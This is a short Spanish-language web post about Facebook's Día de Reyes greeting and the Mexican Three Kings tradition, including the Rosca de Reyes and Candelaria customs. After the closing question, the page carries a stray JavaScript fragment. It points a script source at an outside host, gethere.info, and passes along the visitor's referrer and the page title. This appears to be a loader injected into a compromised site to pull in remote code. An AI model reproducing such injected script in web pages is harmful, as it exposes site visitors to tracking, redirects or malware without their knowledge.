Facebook te desea feliz Día de Reyes

Melchor, Gaspar y Baltasar llegan a Facebook para desearte un Feliz Día de Reyes

La plataforma, Facebook agregó en su timeline un mensaje personalizado para  que puedas enviarle a tus familiares o amigos tus mejores deseos por el Día de los Reyes Magos.

En México cada 6 de enero se celebra la llegada de los Reyes Magos, según cuenta la leyenda, llegaron montados en un camello,  un caballo y un elefante. Guiados en su viaje por una brillante estrella, recorrian el mundo para llegar a adorar al niño Jesús.

Los Reyes Magos cargaron obsequios para el recién nacido: Oro por ser rey, mirra por ser hombre e incienso por ser Dios.

rosca-de-reyes

Una manera en las que se celebra dicho festejo es partiendo la tradicional Rosca de Reyes, suelen hacerse reuniones familiares o con amigos; cada quien parte su porción para saber a “quien le toca el niño”,

En el interior del pan se colocan varios pequeños muñecos de plástico (en respresantación del niño Jesús), y la persona que lo encuentra esta obligada a ofrecer una fiesta con tamales y atole el día 2 de febrero, Día de la Candelaria.

¿Y tú, cómo celebres el Día de Reyes Magos?

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado